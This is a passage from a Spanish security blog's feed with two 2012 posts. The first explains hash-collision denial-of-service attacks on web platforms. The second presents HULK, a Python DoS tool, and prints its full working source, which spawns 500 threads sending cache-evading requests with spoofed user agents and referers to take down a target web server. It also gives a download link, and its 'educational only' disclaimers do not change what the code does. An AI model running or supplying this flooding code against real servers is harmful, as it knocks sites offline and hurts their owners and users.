href="http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf" target="_blank"&gt;Ataques de denegación de servicio eficientes sobre plataformas de aplicaciones web&lt;/a&gt;". En ella hablan de &lt;b&gt;ataques basados en colisiones de hashes&lt;/b&gt; que causan fácilmente pérdidas de servicio en un gran porcentaje de aplicaciones web. &lt;/span&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Pero, ¿en qué consisten estos ataques?. Muchas aplicaciones web automáticamente recogen los parámetros de cada petición y los pegan en un hash de pares de claves para aumentar el rendimiento y la velocidad. La idea es "colisionar" estos hashes mediante peticiones http post para que el servidor objetivo consuma una gran cantidad de CPU al procesarlos.&lt;/span&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Si un atacante es capaz de entender los valores usados en el algoritmo de hashing puede pre-calcular un conjunto de valores de hashes que den como resultado el mismo. Comparar estos hashes se convierte en una función cuadrática que puede crear una carga muy pesada en el servidor web.&lt;/span&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Por ejemplo, enviar aproximadamente dos megabytes de valores que computan el mismo hash provoca que el servidor tenga que comparar más de 40 billones de strings. Wow!&lt;/span&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Es fácil encontrar estas colisiones en lenguages que no aleatorizan las funciones de hashing: node.js/v8, php, python, ASP, ruby, java, etc. Sólo unos pocos se salvan, como cruby (1.9 ~2008) o perl (5.8.1 ~2003). De hecho se comenzó esta investigación a partir de la FAQ de seguridad de Perl (perldoc perlsec) en la que se habla de un fallo de seguridad en versiones anteriores a la 5.8.1, que permitían ataques de colisiones de hashes. Podéis encontrar los lenguajes y versiones afectas y parcheadas &lt;a href="http://www.ocert.org/advisories/ocert-2011-003.html" target="_blank"&gt;aquí&lt;/a&gt;. &lt;/span&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;br style="font-family: Verdana, sans-serif;" /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Y finalmente, ¿cómo puedo explotar esta vulnerabilidad? Pues existe una herramienta escrita en Java que puede ayudar a comprobar fácilmente si nuestro servidor es vulnerable: &lt;a href="http://magic-hash.com/" target="_blank"&gt;PostTester&lt;/a&gt;. Eso sí, la versión gratuita está limitada sólo a direccionamiento privado (127.0.0.x, 10.xxx, 172.16.xx a 172.31.xx y 192.168.xx).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-QIRh3h8M-po/T7YVvLCHiWI/AAAAAAAAEtY/IcMdXF7kRvs/s1600/posttester.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="308" kba="true" src="http://3.bp.blogspot.com/-QIRh3h8M-po/T7YVvLCHiWI/AAAAAAAAEtY/IcMdXF7kRvs/s400/posttester.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-8398664782072782125?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/8398664782072782125/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=8398664782072782125" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/8398664782072782125" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/8398664782072782125" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/ataques-dos-efectivos-mediante.html" title="Ataques DoS efectivos mediante colisiones de hashes" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-s314V0HWZb4/T7YWVJl8FcI/AAAAAAAAEtg/l7oQJ4Arkv4/s72-c/huella_hash.png" height="72" width="72" /><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-8412165970090989764</id><published>2012-05-17T18:50:00.000+02:00</published><updated>2012-05-17T18:50:00.900+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="herramientas" /><category scheme="http://www.blogger.com/atom/ns#" term="dos" /><title type="text">HULK, una herramienta DoS para servidores web</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-eoLvdVqLqVg/T7UbUek4dPI/AAAAAAAAEs8/GGYohc-xS_8/s1600/hulk.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://4.bp.blogspot.com/-eoLvdVqLqVg/T7UbUek4dPI/AAAAAAAAEs8/GGYohc-xS_8/s200/hulk.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;La mayoría de las herramientas DoS comparten un problema... crean patrones repetibles, demasiado fáciles de predecir y, por lo tanto, permiten mitigar sus efectos. &lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;b&gt;HULK (Http Unbearable Load King)&lt;/b&gt; es una sencilla herramienta DoS escrita en Python cuyo principal objetivo es generar peticiones únicas para evitar/evadir motores de caché e incidir directamente en la carga del servidor. Las principales técnicas que utiliza son las siguientes:&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;- Ofuscación del origen: cada petición del cliente se envía con un agente de usuario distinto seleccionado aleatoriamente de una lista.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;- Falsificación de referencias: el &lt;i&gt;referer&lt;/i&gt; que incluye la petición está ofuscado y apunta hacia el mismo servidor objetivo u otros sitios web conocidos.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;- Adhesión: utiliza comandos estándar HTTP para tratar de hacer que el servidor mantenga las conexiones abiertas mediante el uso de &lt;i&gt;Keep-Alive&lt;/i&gt; con una ventana de tiempo variable.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;- no-cache: se solicita al servidor HTTP &lt;i&gt;no-cache&lt;/i&gt; para obtener una página única.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;- Transformación de URL única: para evitar la caché y otras herramientas de optimización, se utilizan nombres de parámetros y valores aleatoriamente en cada petición, lo que hace que cada petición sea única y que el servidor tenga que procesarla en cada caso.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;b&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Resultados&lt;/span&gt;&lt;/b&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;El autor Barry Shteiman comenta que ha realizado pruebas contra un servidor web con 4GB de RAM y Microsoft IIS7 y fue capaz de tirarlo en menos de un minuto, lanzando todas las peticiones desde un único host.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;En las siguientes imágenes se puede ver la herramienta en acción donde, en la primera (#1), se ejecuta contra una URL y a continuación comienza a generar una carga de solicitudes únicas y las envía hacia el servidor objetivo (host de la URL) y, en segundo lugar (#2), podemos ver que el servidor en algún momento empieza a dejar de responder ya que ha agotado su fondo de recursos.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-HbpnG3l6p5g/T7UcD5WurbI/AAAAAAAAEtE/kASjrekMNbg/s1600/hulk1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="http://2.bp.blogspot.com/-HbpnG3l6p5g/T7UcD5WurbI/AAAAAAAAEtE/kASjrekMNbg/s400/hulk1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-qLGorlXDmbg/T7UcGHHhKKI/AAAAAAAAEtM/K4xQurBMSYQ/s1600/hulk2.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="http://2.bp.blogspot.com/-qLGorlXDmbg/T7UcGHHhKKI/AAAAAAAAEtM/K4xQurBMSYQ/s400/hulk2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;nota: el parámetro opcional "safe" significa matar el proceso cuando los hilos consigan un error 500.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;b&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Descarga&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Fichero : &lt;a href="http://www.mediafire.com/file/tb7d9t203v7twdy/hulk.zip" title="hulk.py"&gt;hulk.py&lt;/a&gt; ( fichero zip)&lt;br /&gt;&lt;pre class="prettyprint" style="overflow: auto;"&gt;&lt;span style="font-size: small;"&gt;# ----------------------------------------------------------------------------------------------&lt;br /&gt;# HULK - HTTP Unbearable Load King&lt;br /&gt;#&lt;br /&gt;# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them&lt;br /&gt;# to their knees by exhausting the resource pool, its is meant for research purposes only&lt;br /&gt;# and any malicious usage of this tool is prohibited.&lt;br /&gt;#&lt;br /&gt;# author :&amp;nbsp; Barry Shteiman , version 1.0&lt;br /&gt;# ----------------------------------------------------------------------------------------------&lt;br /&gt;import urllib2&lt;br /&gt;import sys&lt;br /&gt;import threading&lt;br /&gt;import random&lt;br /&gt;import re&lt;br /&gt;&lt;br /&gt;#global params&lt;br /&gt;url=''&lt;br /&gt;host=''&lt;br /&gt;headers_useragents=[]&lt;br /&gt;headers_referers=[]&lt;br /&gt;request_counter=0&lt;br /&gt;flag=0&lt;br /&gt;safe=0&lt;br /&gt;&lt;br /&gt;def inc_counter():&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; global request_counter&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; request_counter+=1&lt;br /&gt;&lt;br /&gt;def set_flag(val):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; global flag&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; flag=val&lt;br /&gt;&lt;br /&gt;def set_safe():&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; global safe&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; safe=1&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;# generates a user agent array&lt;br /&gt;def useragent_list():&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; global headers_useragents&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; return(headers_useragents)&lt;br /&gt;&lt;br /&gt;# generates a referer array&lt;br /&gt;def referer_list():&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; global headers_referers&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_referers.append('http://www.google.com/?q=')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_referers.append('http://www.usatoday.com/search/results?q=')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_referers.append('http://engadget.search.aol.com/search?q=')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; headers_referers.append('http://' + host + '/')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; return(headers_referers)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;#builds random ascii string&lt;br /&gt;def buildblock(size):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; out_str = ''&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; for i in range(0, size):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; a = random.randint(65, 90)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; out_str += chr(a)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; return(out_str)&lt;br /&gt;&lt;br /&gt;def usage():&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; print '---------------------------------------------------'&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; print 'USAGE: python hulk.py &lt;url&gt;'&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; print 'you can add "safe" after url, to autoshut after dos'&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; print '---------------------------------------------------'&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;#http request&lt;br /&gt;def httpcall(url):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; useragent_list()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; referer_list()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; code=0&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; if url.count("?")&amp;gt;0:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; param_joiner="&amp;amp;"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; else:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; param_joiner="?"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; request.add_header('User-Agent', random.choice(headers_useragents))&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; request.add_header('Cache-Control', 'no-cache')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; request.add_header('Keep-Alive', random.randint(110,120))&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; request.add_header('Connection', 'keep-alive')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; request.add_header('Host',host)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; try:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; urllib2.urlopen(request)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; except urllib2.HTTPError, e:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; #print e.code&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; set_flag(1)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; print 'Response Code 500'&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; code=500&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; except urllib2.URLError, e:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; #print e.reason&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; sys.exit()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; else:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; inc_counter()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; urllib2.urlopen(request)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; return(code)&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;#http caller thread &lt;br /&gt;class HTTPThread(threading.Thread):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; def run(self):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; try:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; while flag&amp;lt;2:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; code=httpcall(url)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; if (code==500) &amp;amp; (safe==1):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; set_flag(2)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; except Exception, ex:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; pass&lt;br /&gt;&lt;br /&gt;# monitors http threads and counts requests&lt;br /&gt;class MonitorThread(threading.Thread):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; def run(self):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; previous=request_counter&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; while flag==0:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; if (previous+100&lt;request_counter) &amp;amp;="" (previous&lt;=""&gt;request_counter):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; print "%d Requests Sent" % (request_counter)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; previous=request_counter&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; if flag==2:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; print "\n-- HULK Attack Finished --"&lt;br /&gt;&lt;br /&gt;#execute &lt;br /&gt;if len(sys.argv) &amp;lt; 2:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; usage()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; sys.exit()&lt;br /&gt;else:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; if sys.argv[1]=="help":&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; usage()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; sys.exit()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; else:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; print "-- HULK Attack Started --"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; if len(sys.argv)== 3:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; if sys.argv[2]=="safe":&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; set_safe()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; url = sys.argv[1]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; if url.count("/")==2:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; url = url + "/"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; m = re.search('http\://([^/]*)/?.*', url)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; host = m.group(1)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; for i in range(500):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; t = HTTPThread()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; t.start()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; t = MonitorThread()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; t.start() &lt;/request_counter)&gt;&lt;/url&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;span style="font-size: small;"&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Esta herramienta está pensada para propósitos educativos solamente y no debe ser utilizada para ninguna actividad maliciosa.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Fuente: &lt;a href="http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/" target="_blank"&gt;HULK, Web Server DoS Tool | SECTORIX&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-8412165970090989764?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/8412165970090989764/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=8412165970090989764" title="4 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/8412165970090989764" /><link 